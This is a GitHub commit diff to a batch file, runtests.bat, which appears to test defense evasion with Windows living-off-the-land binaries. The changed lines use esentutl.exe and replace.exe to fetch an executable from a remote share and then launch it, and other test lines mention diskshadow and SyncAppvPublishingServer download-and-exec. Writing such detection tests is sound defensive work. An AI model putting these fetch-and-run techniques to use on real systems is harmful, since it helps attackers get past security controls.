Skip to content

Commit

Permalink
Update runtests.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
op7ic authored Jul 13, 2018
1 parent 16c9b32 commit 3def544
Showing 1 changed file with 5 additions and 2 deletions.
7 changes: 5 additions & 2 deletions runtests.bat
Original file line number Diff line number Diff line change
Expand Up @@ -131,11 +131,13 @@ diskshadow.exe /s diskshadow.txt

echo "[+] TXXXX - Testing Esentutl.exe download"

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d adrestore.exe /o
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d adrestore.exe /o
start "" adrestore.exe

echo "[+] TXXXX - Testing replace.exe download"

replace \\live.sysinternals.com\tools\adrestore.exe adrestore.exe /A
replace \\live.sysinternals.com\tools\adrestore.exe adrestore2.exe /A
start "" adrestore2.exe

echo "[+] TXXXX - Testing SyncAppvPublishingServer.vbs download & exec"

Expand Down Expand Up @@ -176,4 +178,5 @@ del diskshadow.txt
del adrestore.exe
del Default_File_Path.ps1
del trace.etl
del adrestore2.exe

0 comments on commit 3def544

Please sign in to comment.